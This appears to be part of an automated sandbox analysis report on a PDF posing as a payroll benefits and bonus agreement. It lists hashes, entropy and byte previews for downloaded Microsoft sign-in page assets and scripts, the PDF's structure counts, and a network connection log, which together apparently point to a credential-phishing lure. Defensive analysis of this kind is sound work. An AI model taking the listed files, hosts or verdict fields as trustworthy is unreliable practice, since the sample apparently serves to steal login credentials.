                                                                                                SHA1:1A17F60BF776A8C468A185C1E8E985C41A50DC27
                                                                                                SHA-256:8E3B0117F4DF4BE452C0B6AF5B8F0A0ACF9D4ADE23D08D55D7E312AF22077762
                                                                                                SHA-512:13C412BD66747822C6938926DE1C52B0D98659B2ED48249471EC0340F416645EA9114F06953F1AE5F177DB03A5D62F1FB5D321B2C4EB17F3A1C865B0A274DC5C
                                                                                                Malicious:false
                                                                                                URL:https://cdnjs.cloudflare.com/ajax/libs/crypto-js/4.1.1/crypto-js.min.js
                                                                                                Preview:!function(t,e){"object"==typeof exports?module.exports=exports=e():"function"==typeof define&&define.amd?define([],e):t.CryptoJS=e()}(this,function(){var n,o,s,a,h,t,e,l,r,i,c,f,d,u,p,S,x,b,A,H,z,_,v,g,y,B,w,k,m,C,D,E,R,M,F,P,W,O,I,U=U||function(h){var i;if("undefined"!=typeof window&&window.crypto&&(i=window.crypto),"undefined"!=typeof self&&self.crypto&&(i=self.crypto),!(i=!(i=!(i="undefined"!=typeof globalThis&&globalThis.crypto?globalThis.crypto:i)&&"undefined"!=typeof window&&window.msCrypto?window.msCrypto:i)&&"undefined"!=typeof global&&global.crypto?global.crypto:i)&&"function"==typeof require)try{i=require("crypto")}catch(t){}var r=Object.create||function(t){return e.prototype=t,t=new e,e.prototype=null,t};function e(){}var t={},n=t.lib={},o=n.Base={extend:function(t){var e=r(this);return t&&e.mixIn(t),e.hasOwnProperty("init")&&this.init!==e.init||(e.init=function(){e.$super.init.apply(this,arguments)}),(e.init.prototype=e).$super=this,e},create:function(){var t=this.extend();
                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                File Type:gzip compressed data, max speed, from FAT filesystem (MS-DOS, OS/2, NT), original size modulo 2^32 113424
                                                                                                Category:downloaded
                                                                                                Size (bytes):20410
                                                                                                Entropy (8bit):7.980582012022051
                                                                                                Encrypted:false
                                                                                                SSDEEP:384:8RvmaMFysnOXZ2m9zM+udO6GGUpeAU02oDGnN5EsQwWUQGTS8r2k:8pmm7ZFM+ObGGUIjN5PJV3Tp
                                                                                                MD5:3BA4D76A17ADD0A6C34EE696F28C8541
                                                                                                SHA1:5E8A4B8334539A7EAB798A7799F6E232016CB263
                                                                                                SHA-256:17D6FF63DD857A72F37292B5906B40DC087EA27D7B1DEFCFA6DD1BA82AEA0B59
                                                                                                SHA-512:8DA16A9759BB68A6B408F9F274B882ABB3EE7BA19F888448E495B721094BDB2CE5664E9A26BAE306A00491235EB94C143E53F618CCD6D50307C3C7F2EF1B4455
                                                                                                Malicious:false
                                                                                                URL:https://aadcdn.msauth.net/ests/2.1/content/cdnbundles/converged.v2.login.min_81imvbluez-v5hbzpkxfcg2.css
                                                                                                Preview:...........}k..6..w...R..J.H=GSI..x.9...}T*.....)Q..f<...~.F.h..x..{+.-.....h..n....</v.ev......W.,.bU..rW.I...0x...C..2...6]..W_......../x.........~.z.}.|.#x......Ag*O.|XgU...4 .^'U...mP.A.].Z.U.!..Y.......:.ve.?.!..d.N...xJ...mR......0.@p...lKr/...E.-. .....|l.4.o.i.......L.iF..T{.n....2....VEY.y=..=..T+V./.b....\....7.sH.w{.h.....!.."F.k.!.......d...mS.rh.&G.../..h&..RE"!.A/.......A....L...8.q.M...t[...R...>.6;R..^.Vu..9.[F........>A.:HT}w]......2........p......'T.^]}.^..yJ>.<..pq..h.|..j....j.x..-...c...f...=".)..U.X'.M..l.]ZVtl\.I..}.0.~B0Y'.N...E.4.Xd..e...a.........."..9+d.&..l.$E..R.u.g.Q..w&...~I. .y..D.4;..'.."-.....b...)k.n.M...,3J.z_..&2f.h;.&.R.y..P..X.....\P....*.r...B.$........<....H5.M.."'#.6mQl..mQ5.=.\...O.....^..jM..u*.F..Oh.lNI..j..T..u...I..._........{.\...{..._|..={O..z..>......x..5Q.D7?{...^...^.......o.=.z......v......z.C...Gtw...0!..M@....^...^.x..G....W...{...)..y.<c3...^>{......7._..'d__...;R.
                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                File Type:GIF image data, version 89a, 352 x 3
                                                                                                Category:downloaded
                                                                                                Size (bytes):2672
                                                                                                Entropy (8bit):6.640973516071413
                                                                                                Encrypted:false
                                                                                                SSDEEP:48:ZaOdwduTYPpS9pZy9vDNi1miicsvrJkafMiS+MGQ09DU/X9/4Xp6m5Z9SQcq:4CIuTYPpSTc9vcPZX9/2gzQ/
                                                                                                MD5:166DE53471265253AB3A456DEFE6DA23
                                                                                                SHA1:17C6DF4D7CCF1FA2C9EFD716FBAE0FC2C71C8D6D
                                                                                                SHA-256:A46201581A7C7C667FD42787CD1E9ADF2F6BF809EFB7596E61A03E8DBA9ADA13
                                                                                                SHA-512:80978C1D262BC225A8BA1758DF546E27B5BE8D84CBCF7E6044910E5E05E04AFFEFEC3C0DA0818145EB8A917E1A8D90F4BAC833B64A1F6DE97AD3D5FC80A02308
                                                                                                Malicious:false
                                                                                                URL:https://aadcdn.msauth.net/shared/1.0/content/images/marching_ants_white_8257b0707cbe1d0bd2661b80068676fe.gif
                                                                                                Preview:GIF89a`............!..NETSCAPE2.0.....!.......,....`.....6......P.l.......H....I..:qJ......k....`BY..L*..&...!.......,....0.............<....[.\K8j.tr.g..!.......,....3............^;.*..\UK.]\.%.V.c...!.......,....7........`....lo...[.a..*Rw~i...!.......,....;........h.....l.G-.[K.,_XA]..'g..!.......,....?........i.....g....Z.}..)..u...F..!.......,....C...............P.,nt^.i....Xq...i..!.......,....F...........{^b....n.y..i...\C.-...!.......,....H..............R...o....h.xV!.z#...!.......,"...L.............r.jY..w~aP(.......[i...!.......,(...N.............r....w.aP.j.'.)Y..S..!.......,....H.........`......hew..9`.%z.xVeS..!.......,5...A.........`...\m.Vmtzw.}.d.%...Q..!.......,9...=.........h......3S..s.-W8m...Q..!.......,A...5.........h.....N...:..!..U..!.......,H.............h....M.x...f.i.4..!.......,O...'.........i...tp......(..!.......,X.............j...@.x....!.......,].............j..L..3em..!.......,e.............`......!.......,n..............{i..!..
                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                File Type:gzip compressed data, max speed, from FAT filesystem (MS-DOS, OS/2, NT), original size modulo 2^32 15755
                                                                                                Category:dropped
                                                                                                Size (bytes):5525
                                                                                                Entropy (8bit):7.961202222662501
                                                                                                Encrypted:false
                                                                                                SSDEEP:96:dySl6/e7OAQD3cS66g8cxO4qXgy66F0+fgENU28TjN3KY6meSsj0ktMvB4YJix2I:dNl6/zFDW6dlXV665ReB67j0sEBWxl
                                                                                                MD5:28CE5BF8BACB96D1C2CFA0092145C6EE
                                                                                                SHA1:303A4629C4467AF2C551EC9E6353464C8C25827D
                                                                                                SHA-256:6B89EEC14865DB53FE20FB3C70B0853362E21669DACE19C06172F673B2EDC5CD
                                                                                                SHA-512:6A10794F105EF5C6F7F7DC2C89152A8342E6D9D8D9490783863ED2737FFD5982E916F72E0A9ECB944AB9815FA70BD20C7256A91E2A62D971F80C23822B809A02
                                                                                                Malicious:false
                                                                                                Preview:...........[}w.F....Bh..i3.M.t.rU.....]..M...@.(..........@..N..I-k..;w.....U.F..v....N....]....MC......U.]o>..mJ.w..~.5<......Z.h~8..8J..m......0.&Z:.Z.D_. .Z.....<.f..t..].I:..........b. ...}.ja......'..x......m6..c...$..........b|s......O.a..cE..u.2.*.6jG!.A.....P..?q@?"..).Mk.0.[."V..M..4...4.~}.?.i..D.}h|..$x.Ajm.S..H..-.x.If..]..1.D0.F......pq.(.|...y\...5....y2.q.Fq...[.|..n.b.i_D......xuR......I.TS.4..}|<...o....MG.+@.......\.?."...+[...A..&...{]......u..+p?......|...j....7...=H..cwp.38.;%c.....O..............p...X.g!....r...d..5.%x.....;...j6p...p......c.Nd.:...&.*....%.. tR.d.@.. ...1..6....i....:...s=..V...iN..1../tH..p<..Mo.......`&.7uA;..(lC.......4...?..0..[S@...D..|....=.wh2...<.. ...)..F...!. .C...k...S.pPt......s..K.V...w......7....Zn.d..t]l.........5=.(..#.....l._.Ip......-O.6.,......q4....!XS`6k..k.....9k....{~*.....X....q......l.>x..={j.n..W......e..Q..I/..;a..MS>.!5v.d.B+.o.....q...j.q..Z..=..@g.1q..,yBV91m.j>..4.o...
                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                File Type:gzip compressed data, max speed, from FAT filesystem (MS-DOS, OS/2, NT), original size modulo 2^32 113769
                                                                                                Category:downloaded
                                                                                                Size (bytes):35170
                                                                                                Entropy (8bit):7.993096534744333
                                                                                                Encrypted:true
                                                                                                SSDEEP:768:K+LvEzA9nny7u0zF35Hm4ngomu6yeLDKDnccqmcmHvVVPCLVf:ny7f5GpuheL4htv3Pkf
                                                                                                MD5:171A4DD9400708B88724B57D62B24A6A
                                                                                                SHA1:9C6F1303B8F02FCE18D20EC9CADA11D38D0C4B37
                                                                                                SHA-256:EA00750636C11DBD4FA3ACB1B3CDCBAE3EFA43F6B6C3753444B6D6A242AE9336
                                                                                                SHA-512:5B13B63912B34E3EEEDD8DA5953B869A83DF82FFD2A8D737AA81DC984F1811800A534F340C48041DA803C25B6B8F5605EA8D003B6A09A1874408F95A710F5126
                                                                                                Malicious:false
                                                                                                URL:https://aadcdn.msauth.net/shared/1.0/content/js/asyncchunk/convergedlogin_pstringcustomizationhelper_cc2c59f5ef2c09e14b08.js
                                                                                                Preview:...........kC.H.0......e....0.pX..Iv3..\f..0YY.m..e$.K..o...j..g.3.lpW.......[..Y.?k.Y.......8~.a..../_.;]{.............v...0..q.Dk.w...h-....Z<..l.fA..k3.7..dm....b..-...(,.$...4...f...e...AV..z.mA....O.9........k..h-.......<Z[.GQ.v3....Oq..y:..(..k.$_...._..h-...q..S.ck.=.T......Sq@.:.A.c.(....SDq..Ac.t..m.$Lc....Z...K...O<....f9..p...0Z..3.<...$YK.x.F......v....nm..s$...&..dQ4.......n-.-.......E.XD..-5~...f.....t...-_.....fsg...8kZ..|.{{....p+Lg.t9I..P./ap......o9Wx.._{....k..,...............................7.|..t...Ax.7..b..v..v.m-...~v...:....r..._........,...A........z.....|..t.. [.C.....{...~..c......ua...~.v<.I..P#._{{}._.......Km...eR....u?GY..h..}..gAv...<.l.Z...#.....:P?Q..."..........,.D...I<._.'..-..=..;.>.C_..#.....D[0.Y..*...M.....{.YT,...x..SQ/......N<`...|._.k....0)......+.Z..4...M. ...i...`.ml..-X.E.....d.. .}.e4.{6hz^..}....@....W.1...d8...>.@.....(.'[..`..A..?...yL.|..QTF...-.='S@.Q.sM.`...}.t..$..y^..0J.kC.S...U.
                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                File Type:gzip compressed data, max speed, from FAT filesystem (MS-DOS, OS/2, NT), original size modulo 2^32 57510
                                                                                                Category:downloaded
                                                                                                Size (bytes):16345
                                                                                                Entropy (8bit):7.98960525258912
                                                                                                Encrypted:false
                                                                                                SSDEEP:384:hOBEj/gTOkWow6mhJqXnYI/0PiQBSoe122Yw/:hOBKJBXO586QB+11J
                                                                                                MD5:187B9EBA41FDF66B2C8F7EB645D2BC17
                                                                                                SHA1:B1C034F7F5F754F271D094FB417B9A820C1F712C
                                                                                                SHA-256:CA0FBF8421A0CF4CCDA7310B2AE74CBD92214901EC2D0F273EA3B07F12CF96EA
                                                                                                SHA-512:0D7FB682D24E97C9E3FC04AA87CCB8EC508CA0CF197DA0617EFFD981BC8B5E3600824FDD08F1F31F59D276B5BF53229D00805D984E01D512FD968610C5FE9609
                                                                                                Malicious:false
                                                                                                URL:https://aadcdn.msauth.net/ests/2.1/content/cdnbundles/ux.converged.login.strings-en.min_i8f-75gfk3tbsm8bmatnqa2.js
                                                                                                Preview:...........}Ms#.......\.@..'F.........3RH2....~......Q.x7...}..'.}..?e#...QU]....Vo..................?........w!......=.G...P.../......8z....q._5....g..}g..31......l*...],.b..;..`...Y....3..5.uGAi..NP.6<.w.(..`...y..d.N.x..^u.....^...?..N........Fq.....z..wgN./..Ep/f..c/.D4~X.W~).s/.E8...T...8,:..Q.p>.....7.....4....Z,&c.)n.[.pcQp...4...&...i.............CkL=.....g..m&vG..p... ....:N`y...ea.,....[......^.../D#(y.....l4.n..,.=_.p2P.....A,..RP..E.T......8 .v....Iw.X..?.r......nk....?Wj..a.|..........JAs.j......?.)..t.z.-..m.]..3y...3@...'.)...Aa..1.kQ.....l+.....-q..n.p..{^...$..{/...=a..A...4.VH}..SBwju......S..hN.P..-..O,..S7.J,.....p.iLU.6W.....eO.7 ..C...{.E.Z...1...5s.!uY...@^. ,D".N.E......5.NE..\...VQa.A7..X.B..{.q..Ra..S....x(x7.Cp.#.#..:.......D..`,!IGr.. ...z.?.._0O.......;..0.z.h....5.../...q..5.|..B.OY..k...].Sw.>.".@..!.9.V|...=.dv.3!sr.....#...X8s.w.|7..O/....!.."...3.."D..)...[........!^....3(..{...F2'..q.....x........
                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                File Type:gzip compressed data, max speed, from FAT filesystem (MS-DOS, OS/2, NT), original size modulo 2^32 1864
                                                                                                Category:dropped
                                                                                                Size (bytes):673
                                                                                                Entropy (8bit):7.6596900876595075
                                                                                                Encrypted:false
                                                                                                SSDEEP:12:Xl0t8TUViiYi5m6FhSBXWPsigK99WCqKMvBBFThSqfLd81CK6bC+k7LqZLsFlD:XFUVpkNK0Rwid81p6btk7LqZ6D
                                                                                                MD5:0E176276362B94279A4492511BFCBD98
                                                                                                SHA1:389FE6B51F62254BB98939896B8C89EBEFFE2A02
                                                                                                SHA-256:9A2C174AE45CAC057822844211156A5ED293E65C5F69E1D211A7206472C5C80C
                                                                                                SHA-512:8D61C9E464C8F3C77BF1729E32F92BBB1B426A19907E418862EFE117DBD1F0A26FCC3A6FE1D1B22B836853D43C964F6B6D25E414649767FBEA7FE10D2048D7A1
                                                                                                Malicious:false
                                                                                                Preview:...........U.n.0....}i..P..C..7l/..d........n...G....yl. .E.......Tu.F.........?$.i.s..s...C..wi$.....r....CT.U.FuS..r.e.~...G.q...*..~M..mu}.0.=..&.~.e.WLX.....X..%p..i......7+.........?......WN..%>...$..c..}N....Y4?..x.1.....*.#v...Gal9.!.9.A.u..b..>..".#A2"+...<qc.v....)3...x.p&..K.&..T.r.'....J.T....Q..=..H).X...<.r...KkX........)5i4.+.h.....5.<..5.^O.eC%V^....Nx.E..;..52..h....C"I./.`..O...f..r..n.h.r]}.G^..D.7..i.].}.G.].....{....oW............h.4...}~=6u..k...=.X..+z}.4.].....YS5..J......)......m....w.......~}.C.b_..[.u..9_7.u.u.....y.ss....:_yQ<{..K.V_Z....c.G.N.a...?/..%. .-..K.td....4...5.(.e.`G7..]t?.3..\..... ....G.H...
                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                File Type:GIF image data, version 89a, 352 x 3
                                                                                                Category:downloaded
                                                                                                Size (bytes):3620
                                                                                                Entropy (8bit):6.867828878374734
                                                                                                Encrypted:false
                                                                                                SSDEEP:48:ZumKaT5ezv47j2/ZiRDlq16x8XvEUcg777shHdpHVGJqFd:Eal647jPDlL8XvEUcg77kVGyd
                                                                                                MD5:B540A8E518037192E32C4FE58BF2DBAB
                                                                                                SHA1:3047C1DB97B86F6981E0AD2F96AF40CDF43511AF
                                                                                                SHA-256:8737D721808655F37B333F08A90185699E7E8B9BDAAA15CDB63C8448B426F95D
                                                                                                SHA-512:E3612D9E6809EC192F6E2D035290B730871C269A267115E4A5515CADB7E6E14E3DD4290A35ABAA8D14CF1FA3924DC76E11926AC341E0F6F372E9FC5434B546E5
                                                                                                Malicious:false
                                                                                                URL:https://aadcdn.msauth.net/shared/1.0/content/images/marching_ants_986f40b5a9dc7d39ef8396797f61b323.gif
                                                                                                Preview:GIF89a`.........iii!.......!.&Edited with ezgif.com online GIF maker.!..NETSCAPE2.0.....,....`.....6......P.l.......H....I..:qJ......k....`BY..L*..&...!.......,....`.....9..i....Q4......H..j.=.k9-5_..........j7..({.........!.......,....`.....9.......trV.......H....`.[.q6......>.. .CZ.&!.....M...!.......,....`.....8..........:......H..jJ..U..6_....../.el...q.)...*..!.......,....`.....9.....i..l.go.....H..*".U...f......._......5......n..!.......,....`.....:..i......./.....H...5%.kE/5.........In.a..@&3.....J...!.......,....`.....9.......kr.j.....H..*.-.{Im5c..............@&.........!.......,....`.....9.........j..q....H...].&..\.5.........8..S..........!.......,....`.....9.......3q.g..5....H...:u..............Al..x.q.........!.......,....`.....9......\.F....z....H...zX...ov.........h3N.x4......j..!.......,....`.....9........Q.:......H....y..^...1.........n.!.F......E...!.......,....`.....8.........i,......H....*_.21.I.........%...
                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                File Type:MS Windows icon resource - 6 icons, -128x-128, 16 colors, 72x72, 16 colors
                                                                                                Category:dropped
                                                                                                Size (bytes):17174
                                                                                                Entropy (8bit):2.9129715116732746
                                                                                                Encrypted:false
                                                                                                SSDEEP:24:QSNTmTFxg4lyyyyyyyyyyyyyio7eeeeeeeeekzgsLsLsLsLsLsQZp:nfgyyyyyyyyyyyyynzQQQQQO
                                                                                                MD5:12E3DAC858061D088023B2BD48E2FA96
                                                                                                SHA1:E08CE1A144ECEAE0C3C2EA7A9D6FBC5658F24CE5
                                                                                                SHA-256:90CDAF487716184E4034000935C605D1633926D348116D198F355A98B8C6CD21
                                                                                                SHA-512:C5030C55A855E7A9E20E22F4C70BF1E0F3C558A9B7D501CFAB6992AC2656AE5E41B050CCAC541EFA55F9603E0D349B247EB4912EE169D44044271789C719CD01
                                                                                                Malicious:false
                                                                                                Preview:..............h(..f...HH...........(..00......h....6.. ...........=...............@..........(....A..(....................(....................................."P.........................................."""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333""""""""""""""""""""""""""
                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                File Type:gzip compressed data, max speed, from FAT filesystem (MS-DOS, OS/2, NT), original size modulo 2^32 406986
                                                                                                Category:dropped
                                                                                                Size (bytes):116343
                                                                                                Entropy (8bit):7.997640489040715
                                                                                                Encrypted:true
                                                                                                SSDEEP:3072:s8ovOS/D3L+TGsLMet6+iNLTMMqfC4hyFv0As5:jNSrij/t6+aAMqfCoydM5
                                                                                                MD5:3063B0DA40B45B46602FCE99AC53D315
                                                                                                SHA1:57883FF854B80AD2A76479A0273BE9218B4DA553
                                                                                                SHA-256:C60FB365DF08D31F36EDA468941C309AE3A917ED784A30495800F05E5F98B66B
                                                                                                SHA-512:3EAF55117A825B588972F6AE324F6173EF4F2A309BAB69A9A6CC43C8F9A4EE25C2FA86752C8912542CC353727DC54A034B369D4A4451F0C3B20206C16FA9FE98
                                                                                                Malicious:false
                                                                                                Preview:...........k{.H.(.}............'qz<..>.3==..G..(..../m..]kU.T......|x....T.Z...O....T.........e..]../'.o+gp.k.........F....+#..+.{..|X..J.U.`.F.0...W..7.Ie...J2.Y.~.$.L.8....$...P]4..yQ.P99..P?....?........I%....+^0..&p..2..<........Da...J....F.9<.7.*^.+1O*.0J..........h1....[....h..............u".....C%.+..\.>....T`.1....... i......8.TB(.Uh.b.{...@<y..D^.S.....n".<H.L..O..*.t........p6..\[...yCm.J.k.....b..vg....-.j.$........1....p~3.b.....n....[_c..{1WN.l~.=...........?......S.}U..g.......t..../...........|.+...-y.X\...l.....>;."....ye.\.....h..p.f.8...[/..nd.,.......X.?......-....J.....I.;....t..FSw...a7i...c..Y{.-..>a..4h.Eo..c#...O....~..d....Z..z.'...s.D..E...jb.O.F..0.VW>..]%6........x..O>E.'a0U.....w....."..9.az.6....<a.?..<qvx........ct.K..s.C3..d#..#^R.z..A..u.f..........s.....M.rb(.\v.....%.k....i.f...,C.s..bY..K#...~.>..D..j....m.71..}...37h........P{..7!@...|..ZR.]V....."...0.o....7..peCG....px..j.%r2.....R.k5m..s.
                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                File Type:PNG image data, 2 x 2, 8-bit/color RGB, non-interlaced
                                                                                                Category:dropped
                                                                                                Size (bytes):61
                                                                                                Entropy (8bit):3.990210155325004
                                                                                                Encrypted:false
                                                                                                SSDEEP:3:yionv//thPltV/CI7syxl/k4E08up:6v/lhPgI17Tp
                                                                                                MD5:9246CCA8FC3C00F50035F28E9F6B7F7D
                                                                                                SHA1:3AA538440F70873B574F40CD793060F53EC17A5D
                                                                                                SHA-256:C07D7D29E3C20FA6CA4C5D20663688D52BAD13E129AD82CE06B80EB187D9DC84
                                                                                                SHA-512:A2098304D541DF4C71CDE98E4C4A8FB1746D7EB9677CEBA4B19FF522EFDD981E484224479FD882809196B854DBC5B129962DBA76198D34AAECF7318BD3736C6B
                                                                                                Malicious:false
                                                                                                Preview:.PNG........IHDR...............s....IDAT.....$.....IEND.B`.
                                                                                                File type:PDF document, version 1.4, 1 pages
                                                                                                Entropy (8bit):7.956483344128281
                                                                                                TrID:
                                                                                                • Adobe Portable Document Format (5005/1) 100.00%
                                                                                                File name:Selvi Payroll Benefits & Bonus Agreementfdp.pdf
                                                                                                File size:105'569 bytes
                                                                                                MD5:5e9e3752816b94449f2c5aef35798dc7
                                                                                                SHA1:08ae2a548e3060f8ec1fac3155c3d0e92e719209
                                                                                                SHA256:871d4874d0092b22ff1e21aff42ba88000ed51d1070a57e7ea5999627045bcfe
                                                                                                SHA512:c9f0bfa315921cf5e8526f020facb410003387120cf33cb3bd90ca9104c28dc1b4a2ab911ee387e51a5876caf86df2bda68357fcdb55a835e19a61f117897d46
                                                                                                SSDEEP:1536:b0IWNkZdQutqFHQUBIANNgnGANwxxYFur5vhNNssWJZejTTowxXmG9VlewLk1v22:gNIdtZUlOGAOCYhNN0mL/mmlewLkQO39
                                                                                                TLSH:A2A3F1B0F68DD4FEEDC2C3099B24380D898EF45732C9B65601BD9749A945ED0B3917CA
                                                                                                File Content Preview:%PDF-1.4.%.....1 0 obj.<</Title (ADOBE)./Creator (Chromium)./Producer (Skia/PDF m127)./CreationDate (D:20250106102023+00'00')./ModDate (D:20250106102023+00'00')>>.endobj.3 0 obj.<</CA 1./ca 1./LC 0./LJ 0./LW 1./ML 4./SA true./BM /Normal>>.endobj.4 0 obj.<
                                                                                                Icon Hash:62cc8caeb29e8ae0

                                                                                                General

                                                                                                Header:%PDF-1.4
                                                                                                Total Entropy:7.956483
                                                                                                Total Bytes:105569
                                                                                                Stream Entropy:7.987872
                                                                                                Stream Bytes:97164
                                                                                                Entropy outside Streams:5.166298
                                                                                                Bytes outside Streams:8405
                                                                                                Number of EOF found:1
                                                                                                Bytes after EOF:
                                                                                                NameCount
                                                                                                obj50
                                                                                                endobj50
                                                                                                stream11
                                                                                                endstream11
                                                                                                xref1
                                                                                                trailer1
                                                                                                startxref1
                                                                                                /Page1
                                                                                                /Encrypt0
                                                                                                /ObjStm0
                                                                                                /URI0
                                                                                                /JS1
                                                                                                /JavaScript0
                                                                                                /AA0
                                                                                                /OpenAction0
                                                                                                /AcroForm0
                                                                                                /JBIG2Decode0
                                                                                                /RichMedia0
                                                                                                /Launch0
                                                                                                /EmbeddedFile0

                                                                                                Image Streams

                                                                                                IDDHASHMD5Preview
                                                                                                500000000000000006c35a499af3c2f74a41bd6bb6fa446ed
                                                                                                60804020204092306a35874975512f063bb7837fa204fa9e6
                                                                                                1100000000000000004368d585f7bc391aa7e0707c5887d910
                                                                                                TimestampSource PortDest PortSource IPDest IP
                                                                                                Jan 8, 2025 14:47:59.973877907 CET49675443192.168.2.523.1.237.91
                                                                                                Jan 8, 2025 14:47:59.973881006 CET49674443192.168.2.523.1.237.91
                                                                                                Jan 8, 2025 14:48:00.130122900 CET49673443192.168.2.523.1.237.91
                                                                                                Jan 8, 2025 14:48:08.216406107 CET49708443192.168.2.5103.83.194.55
                                                                                                Jan 8, 2025 14:48:08.216442108 CET44349708103.83.194.55192.168.2.5
                                                                                                Jan 8, 2025 14:48:08.216516018 CET49708443192.168.2.5103.83.194.55
                                                                                                Jan 8, 2025 14:48:08.218512058 CET49708443192.168.2.5103.83.194.55
                                                                                                Jan 8, 2025 14:48:08.218525887 CET44349708103.83.194.55192.168.2.5
                                                                                                Jan 8, 2025 14:48:08.836172104 CET44349708103.83.194.55192.168.2.5
                                                                                                Jan 8, 2025 14:48:08.905272007 CET49708443192.168.2.5103.83.194.55
                                                                                                Jan 8, 2025 14:48:09.012875080 CET49708443192.168.2.5103.83.194.55
                                                                                                Jan 8, 2025 14:48:09.012896061 CET44349708103.83.194.55192.168.2.5
                                                                                                Jan 8, 2025 14:48:09.014096975 CET44349708103.83.194.55192.168.2.5
                                                                                                Jan 8, 2025 14:48:09.014110088 CET44349708103.83.194.55192.168.2.5
                                                                                                Jan 8, 2025 14:48:09.014182091 CET49708443192.168.2.5103.83.194.55
                                                                                                Jan 8, 2025 14:48:09.103441954 CET49708443192.168.2.5103.83.194.55
                                                                                                Jan 8, 2025 14:48:09.103549004 CET44349708103.83.194.55192.168.2.5
                                                                                                Jan 8, 2025 14:48:09.103598118 CET49708443192.168.2.5103.83.194.55
                                                                                                Jan 8, 2025 14:48:09.147327900 CET44349708103.83.194.55192.168.2.5
                                                                                                Jan 8, 2025 14:48:09.281744003 CET44349708103.83.194.55192.168.2.5
                                                                                                Jan 8, 2025 14:48:09.281841993 CET49708443192.168.2.5103.83.194.55
                                                                                                Jan 8, 2025 14:48:09.609850883 CET49708443192.168.2.5103.83.194.55
                                                                                                Jan 8, 2025 14:48:09.609874010 CET44349708103.83.194.55192.168.2.5
                                                                                                Jan 8, 2025 14:48:09.689116955 CET49674443192.168.2.523.1.237.91
                                                                                                Jan 8, 2025 14:48:09.693981886 CET49675443192.168.2.523.1.237.91
                                                                                                Jan 8, 2025 14:48:09.816343069 CET49673443192.168.2.523.1.237.91
                                                                                                Jan 8, 2025 14:48:09.924967051 CET49715443192.168.2.5188.114.96.3
                                                                                                Jan 8, 2025 14:48:09.924998045 CET44349715188.114.96.3192.168.2.5
                                                                                                Jan 8, 2025 14:48:09.925117016 CET49715443192.168.2.5188.114.96.3
                                                                                                Jan 8, 2025 14:48:09.925961971 CET49715443192.168.2.5188.114.96.3
                                                                                                Jan 8, 2025 14:48:09.925973892 CET44349715188.114.96.3192.168.2.5
                                                                                                Jan 8, 2025 14:48:10.398519039 CET44349715188.114.96.3192.168.2.5
                                                                                                Jan 8, 2025 14:48:10.486922026 CET49715443192.168.2.5188.114.96.3
                                                                                                Jan 8, 2025 14:48:10.486937046 CET44349715188.114.96.3192.168.2.5
                                                                                                Jan 8, 2025 14:48:10.488094091 CET44349715188.114.96.3192.168.2.5
                                                                                                Jan 8, 2025 14:48:10.488106966 CET44349715188.114.96.3192.168.2.5
                                                                                                Jan 8, 2025 14:48:10.488162994 CET49715443192.168.2.5188.114.96.3
                                                                                                Jan 8, 2025 14:48:10.508461952 CET49715443192.168.2.5188.114.96.3
                                                                                                Jan 8, 2025 14:48:10.508517027 CET44349715188.114.96.3192.168.2.5
                                                                                                Jan 8, 2025 14:48:10.508708000 CET49715443192.168.2.5188.114.96.3
                                                                                                Jan 8, 2025 14:48:10.508714914 CET44349715188.114.96.3192.168.2.5
                                                                                                Jan 8, 2025 14:48:10.508846045 CET44349715188.114.96.3192.168.2.5
                                                                                                Jan 8, 2025 14:48:10.508925915 CET49715443192.168.2.5188.114.96.3
                                                                                                Jan 8, 2025 14:48:10.509078026 CET49715443192.168.2.5188.114.96.3
                                                                                                Jan 8, 2025 14:48:10.509078026 CET49715443192.168.2.5188.114.96.3
                                                                                                Jan 8, 2025 14:48:10.509090900 CET44349715188.114.96.3192.168.2.5
                                                                                                Jan 8, 2025 14:48:10.509166956 CET49715443192.168.2.5188.114.96.3
                                                                                                Jan 8, 2025 14:48:10.509511948 CET49716443192.168.2.5188.114.96.3
                                                                                                Jan 8, 2025 14:48:10.509550095 CET44349716188.114.96.3192.168.2.5
                                                                                                Jan 8, 2025 14:48:10.509753942 CET49716443192.168.2.5188.114.96.3
                                                                                                Jan 8, 2025 14:48:10.510008097 CET49716443192.168.2.5188.114.96.3
                                                                                                Jan 8, 2025 14:48:10.510020018 CET44349716188.114.96.3192.168.2.5
                                                                                                Jan 8, 2025 14:48:10.990236044 CET44349716188.114.96.3192.168.2.5
                                                                                                Jan 8, 2025 14:48:10.992336988 CET49716443192.168.2.5188.114.96.3
                                                                                                Jan 8, 2025 14:48:10.992357016 CET44349716188.114.96.3192.168.2.5
                                                                                                Jan 8, 2025 14:48:10.993350029 CET44349716188.114.96.3192.168.2.5
                                                                                                Jan 8, 2025 14:48:10.993442059 CET49716443192.168.2.5188.114.96.3
                                                                                                Jan 8, 2025 14:48:10.995563030 CET49716443192.168.2.5188.114.96.3
                                                                                                Jan 8, 2025 14:48:10.995625973 CET44349716188.114.96.3192.168.2.5
                                                                                                Jan 8, 2025 14:48:10.995933056 CET49716443192.168.2.5188.114.96.3
                                                                                                Jan 8, 2025 14:48:10.995939016 CET44349716188.114.96.3192.168.2.5
                                                                                                Jan 8, 2025 14:48:11.115817070 CET49716443192.168.2.5188.114.96.3
                                                                                                Jan 8, 2025 14:48:11.387096882 CET4434970323.1.237.91192.168.2.5
